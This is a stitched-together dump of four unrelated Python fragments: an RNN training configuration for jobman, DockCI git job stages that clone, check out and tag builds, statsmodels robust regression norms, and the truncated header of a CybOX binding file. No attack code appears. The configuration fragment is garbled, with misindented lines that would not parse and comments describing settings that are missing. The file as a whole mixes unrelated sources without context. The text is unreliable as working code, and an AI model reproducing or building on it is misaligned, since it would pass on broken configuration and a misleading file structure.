state['dictionary']= "/data/lisa/data/PennTreebankCorpus/dictionaries.npz"
state['chunks'] = 'chars'
state['seed'] = 123
    # Flag that rarely needs changing: it says what to do if the cost becomes
    # NaN. You could set it to raise, but 'warn' is usually the better choice.
state['on_nan'] = 'warn'
# DATA
    # For Wikipedia the validation set is extremely large, which makes
    # validation very time-consuming. This value is only used for the
    # validation set, and should be something like seqlen * 10000
    # (i.e. validation runs over only 10000 steps).
state['reset'] = -1
    # For music / word level, 50 is a good sequence length. For character
    # level it should be at least 100 (it is hard to reach state-of-the-art
    # results otherwise). Note that most people use 200!
    # The job stops when the learning rate declines to this value. This can
    # be useful, because sometimes it is hopeless to wait for the validation
    # error to get below minerr, or for the time to expire.
state['minlr'] = float(5e-7)
# Layers
# Input
# Input weights are sampled from a gaussian with std=scale; this is the
# standard way to initialize
state['rank_n_approx'] = 0
state['inp_nhids'] = '[400]'
state['inp_activ'] = '[linear]'
state['inp_bias'] = '[0.]'
state['inp_sparse']= -1 # dense
state['inp_scale'] = .1
# This is for the output weights
state['out_scale'] = .1
state['out_bias_scale'] = -.5
state['out_sparse'] = -1
# HidLayer
    # Hidden units for the internal layers of the DT-RNN. Having a single
    # value results in a standard RNN.
state['nhids'] = '[200, 200]'
# Activation of each layer
state['rec_activ'] = '"TT.nnet.sigmoid"'
state['rec_bias'] = '.0'
state['rec_sparse'] ='20'
state['rec_scale'] = '1.'
# sample_weights - you rescale the weights such that the largest
# singular value is scale
# sample_weights_classic : just sample weights from a gaussian with std
# equal to scale
state['rec_init'] = "'sample_weights'"
state['rec_layer'] = 'RecurrentMultiLayerShortPathInpAll'
# SGD params
state['bs'] = 1 # the size of the minibatch
    state['lr'] = 1. # initial learning rate
state['cutoff'] = 1. # threshold for gradient rescaling
state['moment'] = 0.995 #-.1 # momentum
# Do not optimize these
state['weight_noise'] = True # white Gaussian noise in weights
state['weight_noise_amount'] = 0.075 # standard deviation
# maximal number of updates
state['loopIters'] = int(1e8)
# maximal number of minutes to wait until killing job
state['timeStop'] = 48*60 # 48 hours
# Construct linear connections from input to output. These are factored
# (like the rank_n) to deal with the possible high dimensionality of the
# input, but it is a linear projection that feeds into the softmax
state['shortcut_inpout'] = False
state['shortcut_rank'] = 200
# Main Loop
    # Make this a decently large value. Otherwise you waste a lot of memory
    # keeping track of the training error (and other things) at each step,
    # and the stdout becomes extremely large.
state['trainFreq'] = 100
state['hookFreq'] = 5000
state['validFreq'] = 1000
state['saveFreq'] = 15 # save every 15 minutes
state['prefix'] = 'model_' # prefix of the save files
state['reload'] = False # reload
state['overwrite'] = 1
    # The threshold should be 1.004 for PPL; for entropy (which is what
    # everything returns) it should be much smaller. The running value is
    # 1.0002. We should not hyperoptimize this.
state['divide_lr'] = 2.
state['cost_threshold'] = 1.0002
state['patience'] = 1
state['validate_postprocess'] = 'lambda x:10**(x/numpy.log(10))'
state['truncate_gradient'] = 80 # truncated BPTT
state['lr_adapt'] = 0 # 1/(1 + n/n0) scheduling
state['lr_beta'] = 10*1900.
state['lr_start'] = 'on_error'
state['no_noise_bias'] = True # do not use weight noise for biases
state['carry_h0'] = True # carry over h0 across updates
state['sample_steps'] = 80
# Do not change these
state['minerr'] = -1
state['shift'] = 1 # n-step forward prediction
state['cutoff_rescale_length'] = False
jobman(state, None)
|
|
""" Preparation for the main job stages """
import datetime
import glob
import json
import subprocess
from itertools import chain
import py.error # pylint:disable=import-error
import py.path # pylint:disable=import-error
import pygit2
from dockci.models.job_meta.stages import JobStageBase
from dockci.util import (git_head_ref_name,
path_contained,
write_all,
)
def origin_pair(ref_str):
"""
Ensure one ref string starts with ``'origin/'``, and one not
Examples:
>>> origin_pair('master')
('origin/master', 'master')
>>> origin_pair('origin/master')
('origin/master', 'master')
>>> origin_pair('upstream/master')
('origin/upstream/master', 'upstream/master')
>>> origin_pair('origin/upstream/master')
('origin/upstream/master', 'upstream/master')
"""
with_origin = (
ref_str if ref_str.startswith('origin/')
else 'origin/%s' % ref_str
)
without_origin = with_origin[7:]
return with_origin, without_origin
class WorkdirStage(JobStageBase):
""" Prepare the working directory """
slug = 'git_prepare'
def __init__(self, job, workdir):
super(WorkdirStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Clone and checkout the job
"""
job = self.job
handle.write("Cloning from %s\n" % job.display_repo)
repo = pygit2.clone_repository(
job.command_repo,
self.workdir.join('.git').strpath,
)
handle.write("Finding %s\n" % job.commit)
try:
git_obj = repo.revparse_single(job.commit) # noqa pylint:disable=no-member
except KeyError:
try:
git_obj = repo.revparse_single('origin/%s' % job.commit) # noqa pylint:disable=no-member
except KeyError:
handle.write("Can't find that ref anywhere!\n")
return False
ref_type_str = 'unknown ref type'
if git_obj.type == pygit2.GIT_OBJ_BLOB:
ref_type_str = 'blob'
elif git_obj.type == pygit2.GIT_OBJ_COMMIT:
remote_ref, local_ref = origin_pair(job.commit)
branch = repo.lookup_branch( # pylint:disable=no-member
remote_ref,
pygit2.GIT_BRANCH_REMOTE,
)
if branch is not None:
git_obj = branch
ref_type_str = 'branch'
if job.git_branch is None:
job.git_branch = local_ref
else:
ref_type_str = 'commit'
elif git_obj.type == pygit2.GIT_OBJ_TAG:
ref_type_str = 'tag'
if job.tag is None:
job.tag = git_obj.name
elif git_obj.type == pygit2.GIT_OBJ_TREE:
ref_type_str = 'treeish'
ref_name_str = (
getattr(git_obj, 'shorthand', None) or
getattr(git_obj, 'name', None) or
job.commit
)
while git_obj.type != pygit2.GIT_OBJ_COMMIT:
git_obj = git_obj.get_object()
oid = getattr(git_obj, 'oid', None) or getattr(git_obj, 'target')
job.commit = oid.hex
job.save()
handle.write("Checking out %s %s\n" % (ref_type_str, ref_name_str))
repo.reset( # pylint:disable=no-member
oid,
pygit2.GIT_RESET_HARD,
)
# check for, and load job config
job_config_file = self.workdir.join('dockci.yaml')
if job_config_file.check(file=True):
# pylint:disable=no-member
job.job_config.load_yaml_file(job_config_file)
return True
class GitInfoStage(JobStageBase):
""" Fill the Job with information obtained from the git repo """
slug = 'git_info'
def __init__(self, job, workdir):
super(GitInfoStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Execute git to retrieve info
"""
job = self.job
repo = pygit2.Repository(self.workdir.join('.git').strpath)
commit = repo[repo.head.target] # pylint:disable=no-member
job.git_author_name = commit.author.name
job.git_author_email = commit.author.email
job.git_committer_name = commit.committer.name
job.git_committer_email = commit.committer.email
handle.write("Author name is %s\n" % job.git_author_name)
handle.write("Author email is %s\n" % job.git_author_email)
handle.write("Committer name is %s\n" % job.git_committer_name)
handle.write("Committer email is %s\n" % job.git_committer_email)
job.resolve_job_ancestor(repo)
if job.ancestor_job:
handle.write((
"Ancestor job is %s\n" % job.ancestor_job.slug
).encode())
if job.git_branch is None:
job.git_branch = git_head_ref_name(self.workdir)
if self.job.git_branch is None:
handle.write("Branch name could not be determined\n".encode())
else:
handle.write(("Branch is %s\n" % self.job.git_branch).encode())
self.job.save()
return True
class GitChangesStage(JobStageBase):
"""
Get a list of changes from git between now and the most recently built
ancestor
"""
slug = 'git_changes'
def __init__(self, job, workdir):
super(GitChangesStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
job = self.job
if job.ancestor_job:
repo = pygit2.Repository(self.workdir.join('.git').strpath)
walker = repo.walk(repo.head.target, pygit2.GIT_SORT_TIME) # noqa pylint:disable=no-member
at_least_one = False
for commit in walker:
if commit.hex.startswith(job.ancestor_job.commit):
break
at_least_one = True
handle.write('Commit: %s\n' % commit.hex)
if len(commit.parent_ids) > 1:
handle.write('Merge: %s\n' % (
' '.join((str(i) for i in commit.parent_ids)),
))
handle.write('Author: %s <%s>\n' % (
commit.author.name,
commit.author.email,
))
commit_tz = datetime.timezone(datetime.timedelta(
minutes=commit.commit_time_offset,
))
commit_dt = datetime.datetime.fromtimestamp(
commit.commit_time, commit_tz,
)
handle.write('Date: %s\n' % commit_dt.strftime('%c %z'))
double_nl = False
for line in commit.message.split('\n'):
if len(line.strip()) == 0:
handle.write('\n')
double_nl = True
else:
handle.write(' %s\n' % line)
double_nl = line.endswith('\n')
# Ensure blank line between commits
if not double_nl:
handle.write('\n')
if not at_least_one:
handle.write('No changes')
return 0
def recursive_mtime(path, timestamp):
"""
Recursively set mtime on the given path, returning the number of
additional files or directories changed
"""
path.setmtime(timestamp)
extra = 0
if path.isdir():
for subpath in path.visit():
try:
subpath.setmtime(timestamp)
extra += 1
except py.error.ENOENT:
pass
return extra
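# Example usage (hedged sketch): normalise mtimes under a checkout so that
# Docker build caching is not defeated by fresh-clone timestamps. The path and
# timestamp below are purely illustrative.
#
#     import time
#     workdir = py.path.local('/tmp/checkout')
#     extra = recursive_mtime(workdir, time.time() - 3600)
#     print('touched %d additional paths' % extra)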
class GitMtimeStage(JobStageBase):
"""
Change the modified time to the commit time for any files in an ADD
directive of a Dockerfile
"""
slug = 'git_mtime'
def __init__(self, job, workdir):
super(GitMtimeStage, self).__init__(job)
self.workdir = workdir
def dockerfile_globs(self, dockerfile='Dockerfile'):
""" Get all glob patterns from the Dockerfile """
dockerfile_path = self.workdir.join(dockerfile)
with dockerfile_path.open() as handle:
for line in handle:
if line[:4] == 'ADD ':
add_value = line[4:]
try:
for path in json.loads(add_value)[:-1]:
yield path
except ValueError:
add_file, _ = add_value.split(' ', 1)
yield add_file
yield dockerfile
yield '.dockerignore'
def sorted_dockerfile_globs(self, reverse=False, dockerfile='Dockerfile'):
"""
Sorted globs from the Dockerfile. Paths are sorted based on depth
"""
def keyfunc(glob_str):
""" Compare paths, ranking higher level dirs lower """
path = self.workdir.join(glob_str)
try:
if path.samefile(self.workdir):
return -1
except py.error.ENOENT:
pass
return len(path.parts())
return sorted(self.dockerfile_globs(dockerfile),
key=keyfunc,
reverse=reverse)
def timestamp_for(self, path):
""" Get the timestamp for the given path """
if path.samefile(self.workdir):
git_cmd = [
'git', 'log', '-1', '--format=format:%ct',
]
else:
git_cmd = [
'git', 'log', '-1', '--format=format:%ct', '--', path.strpath,
]
# Get the timestamp
return int(subprocess.check_output(
git_cmd,
stderr=subprocess.STDOUT,
cwd=self.workdir.strpath,
))
def path_mtime(self, handle, path):
"""
        Set the mtime on the given path, writing messages to the file handle
given as necessary
"""
# Ensure path is inside workdir
if not path_contained(self.workdir, path):
write_all(handle,
"%s not in the workdir; failing" % path.strpath)
return False
if not path.check():
return True
# Show the file, relative to workdir
relpath = self.workdir.bestrelpath(path)
write_all(handle, "%s: " % relpath)
try:
timestamp = self.timestamp_for(path)
except subprocess.CalledProcessError as ex:
# Something happened with the git command
write_all(handle, [
"Could not retrieve commit time from git. Exit "
"code %d:\n" % ex.returncode,
ex.output,
])
return False
except ValueError as ex:
# A non-int value returned
write_all(handle,
"Unexpected output from git: %s\n" % ex.args[0])
return False
# User output
mtime = datetime.datetime.fromtimestamp(timestamp)
write_all(handle, "%s... " % mtime.strftime('%Y-%m-%d %H:%M:%S'))
# Set the time!
extra = recursive_mtime(path, timestamp)
extra_txt = ("(and %d more) " % extra) if extra > 0 else ""
handle.write("{}DONE!\n".format(extra_txt).encode())
if path.samefile(self.workdir):
write_all(
handle,
"** Note: Performance benefits may be gained by adding "
"only necessary files, rather than the whole source tree "
"**\n",
)
return True
def runnable(self, handle):
""" Scrape the Dockerfile, update any ``mtime``s """
dockerfile = self.job.job_config.dockerfile
try:
globs = self.sorted_dockerfile_globs(dockerfile=dockerfile)
except py.error.ENOENT:
write_all(
handle,
"Dockerfile '%s' not found! Can not continue" % dockerfile,
)
return 1
# Join with workdir, unglob, and turn into py.path.local
all_files = chain(*(
(
py.path.local(path)
for path in glob.iglob(self.workdir.join(repo_glob).strpath)
)
for repo_glob in globs
))
success = True
for path in all_files:
success &= self.path_mtime(handle, path)
return 0 if success else 1
class TagVersionStage(JobStageBase):
""" Try and add a version to the job, based on git tag """
slug = 'git_tag'
def __init__(self, job, workdir):
super(TagVersionStage, self).__init__(job)
self.workdir = workdir
def runnable(self, handle):
"""
Examples:
>>> from io import StringIO
>>> from subprocess import check_call
>>> test_path = getfixture('tmpdir')
>>> test_file = test_path.join('test.txt')
>>> test_file.write('test')
>>> _ = test_path.chdir()
>>> _ = check_call(['git', 'init'])
>>> _ = check_call(['git', 'config', 'user.email', 'a@example.com'])
>>> _ = check_call(['git', 'config', 'user.name', 'Test'])
>>> _ = check_call(['git', 'add', '.'])
>>> _ = check_call(['git', 'commit', '-m', 'First'])
Identifies untagged commits:
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Untagged commit
<BLANKLINE>
Finds all annotated commits, warns when multiple, ignores light tags:
>>> _ = check_call(['git', 'tag', '-a', 'test-1', '-m', 'Test 1'])
>>> _ = check_call(['git', 'tag', '-a', 'test-2', '-m', 'Test 2'])
>>> _ = check_call(['git', 'tag', 'test-3'])
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 1 (test-1)
Tag: Test 2 (test-2)
WARNING: Multiple tags; using "test-1"
<BLANKLINE>
Deals with untagged commits, where tags exist elsewhere:
>>> test_file.write('other')
>>> _ = check_call(['git', 'commit', '-m', 'Second', '.'])
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Untagged commit
<BLANKLINE>
Finds only tags associated with the commit:
>>> test_file.write('more')
>>> _ = check_call(['git', 'commit', '-m', 'Third', '.'])
>>> _ = check_call('GIT_COMMITTER_DATE=2016-01-01T12:00:00 '
... 'git tag -a test-4 -m "Test 4"', shell=True)
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 4 (test-4)
<BLANKLINE>
Uses the tag created at the latest time:
>>> _ = check_call('GIT_COMMITTER_DATE=2016-01-01T13:00:00 '
... 'git tag -a zzz-later -m "ZZZ"', shell=True)
>>> output = StringIO()
>>> TagVersionStage(None, test_path).runnable(output)
True
>>> print(output.getvalue())
Tag: Test 4 (test-4)
Tag: ZZZ (zzz-later)
WARNING: Multiple tags; using "zzz-later"
<BLANKLINE>
"""
# pygit2 fails member checks because it's CFFI
# pylint:disable=no-member
repo = pygit2.Repository(self.workdir.join('.git').strpath)
head_oid = repo.head.get_object().oid
repo_tag_refs = (
repo.lookup_reference(ref_str)
for ref_str in repo.listall_references()
if ref_str.startswith('refs/tags/')
)
repo_ref_targets = (
repo[ref.target] for ref in repo_tag_refs
)
repo_ann_tags = (
git_obj for git_obj in repo_ref_targets
if isinstance(git_obj, pygit2.Tag)
)
head_tags = (
tag for tag in repo_ann_tags
if tag.target == head_oid
)
tag_count = 0
commit_tag = None
for tag in head_tags:
tag_count += 1
if commit_tag is None:
commit_tag = tag
elif tag.tagger.time > commit_tag.tagger.time:
commit_tag = tag
handle.write("Tag: {message} ({name})\n".format(
message=tag.message.strip(),
name=tag.name,
))
handle.flush()
if tag_count == 0:
handle.write("Untagged commit\n")
elif tag_count > 1:
handle.write("WARNING: Multiple tags; using \"{name}\"\n".format(
name=commit_tag.name,
))
handle.flush()
if tag_count > 0 and self.job is not None:
self.job.tag = commit_tag.name
self.job.save()
return True
|
|
import numpy as np
#TODO: add plots to weighting functions for online docs.
class RobustNorm(object):
"""
The parent class for the norms used for robust regression.
Lays out the methods expected of the robust norms to be used
by statsmodels.RLM.
Parameters
----------
None :
Some subclasses have optional tuning constants.
References
----------
PJ Huber. 'Robust Statistics' John Wiley and Sons, Inc., New York, 1981.
DC Montgomery, EA Peck. 'Introduction to Linear Regression Analysis',
John Wiley and Sons, Inc., New York, 2001.
    W Venables, B Ripley. 'Modern Applied Statistics with S',
Springer, New York, 2002.
See Also
--------
statsmodels.rlm for more information on how the estimators are used
and the inputs for the methods of RobustNorm and subclasses.
Notes
-----
Currently only M-estimators are available.
"""
def rho(self, z):
"""
The robust criterion estimator function.
Abstract method:
-2 loglike used in M-estimator
"""
raise NotImplementedError
def psi(self, z):
"""
Derivative of rho. Sometimes referred to as the influence function.
Abstract method:
psi = rho'
"""
raise NotImplementedError
def weights(self, z):
"""
Returns the value of psi(z) / z
Abstract method:
psi(z) / z
"""
raise NotImplementedError
def psi_deriv(self, z):
'''
        Derivative of psi. Used to obtain robust covariance matrix.
See statsmodels.rlm for more information.
Abstract method:
        psi_deriv = psi'
'''
raise NotImplementedError
def __call__(self, z):
"""
Returns the value of estimator rho applied to an input
"""
return self.rho(z)
class LeastSquares(RobustNorm):
"""
Least squares rho for M-estimation and its derived functions.
See also
--------
statsmodels.robust.norms.RobustNorm for the methods.
"""
def rho(self, z):
"""
The least squares estimator rho function
Parameters
-----------
z : array
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2
"""
return z**2 * 0.5
def psi(self, z):
"""
The psi function for the least squares estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z
"""
return np.asarray(z)
def weights(self, z):
"""
The least squares estimator weighting function for the IRLS algorithm.
The psi function scaled by the input z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = np.ones(z.shape)
"""
z = np.asarray(z)
return np.ones(z.shape, np.float64)
def psi_deriv(self, z):
"""
The derivative of the least squares psi function.
Returns
-------
psi_deriv : array
ones(z.shape)
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.ones(z.shape, np.float64)
class HuberT(RobustNorm):
"""
Huber's T for M estimation.
Parameters
----------
t : float, optional
The tuning constant for Huber's t function. The default value is
1.345.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, t=1.345):
self.t = t
def _subset(self, z):
"""
Huber's T is defined piecewise over the range for z
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.t)
def rho(self, z):
"""
The robust criterion function for Huber's t.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = .5*z**2 for \|z\| <= t
rho(z) = \|z\|*t - .5*t**2 for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
return (test * 0.5 * z**2 +
(1 - test) * (np.fabs(z) * self.t - 0.5 * self.t**2))
def psi(self, z):
"""
The psi function for Huber's t estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= t
psi(z) = sign(z)*t for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
return test * z + (1 - test) * self.t * np.sign(z)
def weights(self, z):
"""
Huber's t weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= t
weights(z) = t/\|z\| for \|z\| > t
"""
z = np.asarray(z)
test = self._subset(z)
absz = np.fabs(z)
absz[test] = 1.0
return test + (1 - test) * self.t / absz
def psi_deriv(self, z):
"""
The derivative of Huber's t psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.less_equal(np.fabs(z), self.t)
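# Quick illustration (hedged): Huber's T leaves small residuals alone and
# downweights large ones. With the default t = 1.345,
# HuberT().weights(np.array([0.5, 2.0, 10.0])) is approximately
# [1.0, 0.6725, 0.1345], i.e. 1 for |z| <= t and t/|z| beyond that.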
#TODO: untested, but looks right. RamsayE not available in R or SAS?
class RamsayE(RobustNorm):
"""
Ramsay's Ea for M estimation.
Parameters
----------
a : float, optional
The tuning constant for Ramsay's Ea function. The default value is
0.3.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = .3):
self.a = a
def rho(self, z):
"""
The robust criterion function for Ramsay's Ea.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = a**-2 * (1 - exp(-a*\|z\|)*(1 + a*\|z\|))
"""
z = np.asarray(z)
return (1 - np.exp(-self.a * np.fabs(z)) *
(1 + self.a * np.fabs(z))) / self.a**2
def psi(self, z):
"""
The psi function for Ramsay's Ea estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z*exp(-a*\|z\|)
"""
z = np.asarray(z)
return z * np.exp(-self.a * np.fabs(z))
def weights(self, z):
"""
Ramsay's Ea weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = exp(-a*\|z\|)
"""
z = np.asarray(z)
return np.exp(-self.a * np.fabs(z))
def psi_deriv(self, z):
"""
The derivative of Ramsay's Ea psi function.
Notes
-----
Used to estimate the robust covariance matrix.
"""
return np.exp(-self.a * np.fabs(z)) + z**2*\
np.exp(-self.a*np.fabs(z))*-self.a/np.fabs(z)
class AndrewWave(RobustNorm):
"""
Andrew's wave for M estimation.
Parameters
----------
a : float, optional
The tuning constant for Andrew's Wave function. The default value is
1.339.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = 1.339):
self.a = a
def _subset(self, z):
"""
Andrew's wave is defined piecewise over the range of z.
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.a * np.pi)
def rho(self, z):
"""
The robust criterion function for Andrew's wave.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = a*(1-cos(z/a)) for \|z\| <= a*pi
rho(z) = 2*a for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return (test * a * (1 - np.cos(z / a)) +
(1 - test) * 2 * a)
def psi(self, z):
"""
The psi function for Andrew's wave
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = sin(z/a) for \|z\| <= a*pi
psi(z) = 0 for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return test * np.sin(z / a)
def weights(self, z):
"""
Andrew's wave weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = sin(z/a)/(z/a) for \|z\| <= a*pi
weights(z) = 0 for \|z\| > a*pi
"""
a = self.a
z = np.asarray(z)
test = self._subset(z)
return test * np.sin(z / a) / (z / a)
def psi_deriv(self, z):
"""
The derivative of Andrew's wave psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
test = self._subset(z)
return test*np.cos(z / self.a)/self.a
#TODO: this is untested
class TrimmedMean(RobustNorm):
"""
Trimmed mean function for M-estimation.
Parameters
----------
c : float, optional
        The tuning constant for the trimmed mean function. The default value is
2.0.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, c=2.):
self.c = c
def _subset(self, z):
"""
Least trimmed mean is defined piecewise over the range of z.
"""
z = np.asarray(z)
return np.less_equal(np.fabs(z), self.c)
def rho(self, z):
"""
The robust criterion function for least trimmed mean.
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2 for \|z\| <= c
rho(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test * z**2 * 0.5
def psi(self, z):
"""
The psi function for least trimmed mean
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= c
psi(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test * z
def weights(self, z):
"""
Least trimmed mean weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= c
weights(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
test = self._subset(z)
return test
def psi_deriv(self, z):
"""
The derivative of least trimmed mean psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
test = self._subset(z)
return test
class Hampel(RobustNorm):
"""
Hampel function for M-estimation.
Parameters
----------
a : float, optional
b : float, optional
c : float, optional
The tuning constants for Hampel's function. The default values are
a,b,c = 2, 4, 8.
See also
--------
statsmodels.robust.norms.RobustNorm
"""
def __init__(self, a = 2., b = 4., c = 8.):
self.a = a
self.b = b
self.c = c
def _subset(self, z):
"""
Hampel's function is defined piecewise over the range of z
"""
z = np.fabs(np.asarray(z))
t1 = np.less_equal(z, self.a)
t2 = np.less_equal(z, self.b) * np.greater(z, self.a)
t3 = np.less_equal(z, self.c) * np.greater(z, self.b)
return t1, t2, t3
def rho(self, z):
"""
The robust criterion function for Hampel's estimator
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
rho(z) = (1/2.)*z**2 for \|z\| <= a
rho(z) = a*\|z\| - 1/2.*a**2 for a < \|z\| <= b
rho(z) = a*(c*\|z\|-(1/2.)*z**2)/(c-b) for b < \|z\| <= c
rho(z) = a*(b + c - a) for \|z\| > c
"""
z = np.fabs(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
v = (t1 * z**2 * 0.5 +
t2 * (a * z - a**2 * 0.5) +
t3 * (a * (c * z - z**2 * 0.5) / (c - b) - 7 * a**2 / 6.) +
             (1 - (t1 + t2 + t3)) * a * (b + c - a))  # indicator of |z| > c
return v
def psi(self, z):
"""
The psi function for Hampel's estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
psi(z) = z for \|z\| <= a
psi(z) = a*sign(z) for a < \|z\| <= b
psi(z) = a*sign(z)*(c - \|z\|)/(c-b) for b < \|z\| <= c
psi(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
s = np.sign(z)
z = np.fabs(z)
        # The outer factor s already carries the sign, so the inner terms must
        # not include it again.
        v = s * (t1 * z +
                 t2 * a +
                 t3 * a * (c - z) / (c - b))
return v
def weights(self, z):
"""
Hampel weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
weights(z) = 1 for \|z\| <= a
weights(z) = a/\|z\| for a < \|z\| <= b
weights(z) = a*(c - \|z\|)/(\|z\|*(c-b)) for b < \|z\| <= c
weights(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
a = self.a; b = self.b; c = self.c
t1, t2, t3 = self._subset(z)
v = (t1 +
t2 * a/np.fabs(z) +
t3 * a*(c-np.fabs(z))/(np.fabs(z)*(c-b)))
        v[np.where(np.isnan(v))] = 1.  # z == 0 gives 0/0 = nan; such points lie in the first region, where the weight is 1
return v
def psi_deriv(self, z):
t1, t2, t3 = self._subset(z)
        # psi is the identity on the first interval, constant (a*sign(z)) on
        # the second, and decreases with slope -a/(c - b) on the third.
        return t1 - t3 * self.a / (self.c - self.b)
class TukeyBiweight(RobustNorm):
"""
Tukey's biweight function for M-estimation.
Parameters
----------
c : float, optional
The tuning constant for Tukey's Biweight. The default value is
c = 4.685.
Notes
-----
Tukey's biweight is sometime's called bisquare.
"""
def __init__(self, c = 4.685):
self.c = c
def _subset(self, z):
"""
Tukey's biweight is defined piecewise over the range of z
"""
z = np.fabs(np.asarray(z))
return np.less_equal(z, self.c)
def rho(self, z):
"""
The robust criterion function for Tukey's biweight estimator
Parameters
----------
z : array-like
1d array
Returns
-------
rho : array
            rho(z) = -(1 - (z/c)**2)**3 * c**2/6. for \|z\| <= c
            rho(z) = 0 for \|z\| > c
"""
subset = self._subset(z)
return -(1 - (z / self.c)**2)**3 * subset * self.c**2 / 6.
def psi(self, z):
"""
The psi function for Tukey's biweight estimator
The analytic derivative of rho
Parameters
----------
z : array-like
1d array
Returns
-------
psi : array
            psi(z) = z*(1 - (z/c)**2)**2 for \|z\| <= c
            psi(z) = 0 for \|z\| > c
"""
z = np.asarray(z)
subset = self._subset(z)
return z * (1 - (z / self.c)**2)**2 * subset
def weights(self, z):
"""
Tukey's biweight weighting function for the IRLS algorithm
The psi function scaled by z
Parameters
----------
z : array-like
1d array
Returns
-------
weights : array
            weights(z) = (1 - (z/c)**2)**2 for \|z\| <= c
            weights(z) = 0 for \|z\| > c
"""
subset = self._subset(z)
return (1 - (z / self.c)**2)**2 * subset
def psi_deriv(self, z):
"""
The derivative of Tukey's biweight psi function
Notes
-----
Used to estimate the robust covariance matrix.
"""
subset = self._subset(z)
return subset*((1 - (z/self.c)**2)**2 - (4*z**2/self.c**2) *\
(1-(z/self.c)**2))
def estimate_location(a, scale, norm=None, axis=0, initial=None,
maxiter=30, tol=1.0e-06):
"""
M-estimator of location using self.norm and a current
estimator of scale.
This iteratively finds a solution to
norm.psi((a-mu)/scale).sum() == 0
Parameters
----------
a : array
Array over which the location parameter is to be estimated
scale : array
Scale parameter to be used in M-estimator
norm : RobustNorm, optional
Robust norm used in the M-estimator. The default is HuberT().
axis : int, optional
Axis along which to estimate the location parameter. The default is 0.
initial : array, optional
Initial condition for the location parameter. Default is None, which
uses the median of a.
    maxiter : int, optional
Maximum number of iterations. The default is 30.
tol : float, optional
        Tolerance for convergence. The default is 1e-06.
Returns
--------
mu : array
Estimate of location
"""
if norm is None:
norm = HuberT()
if initial is None:
mu = np.median(a, axis)
else:
mu = initial
for iter in range(maxiter):
W = norm.weights((a-mu)/scale)
nmu = np.sum(W*a, axis) / np.sum(W, axis)
if np.alltrue(np.less(np.fabs(mu - nmu), scale * tol)):
return nmu
else:
mu = nmu
raise ValueError("location estimator failed to converge in %d iterations"\
% maxiter)
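# Example usage (hedged sketch): robust location estimate for data with a few
# gross outliers, using the MAD as a preliminary scale estimate. The numbers
# are illustrative only.
#
#     a = np.array([1.1, 0.9, 1.0, 1.2, 0.8, 1.05, 9.5, 10.2])
#     scale = np.median(np.fabs(a - np.median(a))) / 0.6745
#     mu = estimate_location(a, scale, norm=HuberT())
#     # mu stays near the bulk of the data, while a.mean() (about 3.2)
#     # is dragged toward the outliers.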
|
|
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Thu Apr 11 15:06:20 2013 by generateDS.py version 2.9a.
#
import sys
import getopt
import re as re_
import cybox.bindings.cybox_core as cybox_core_binding
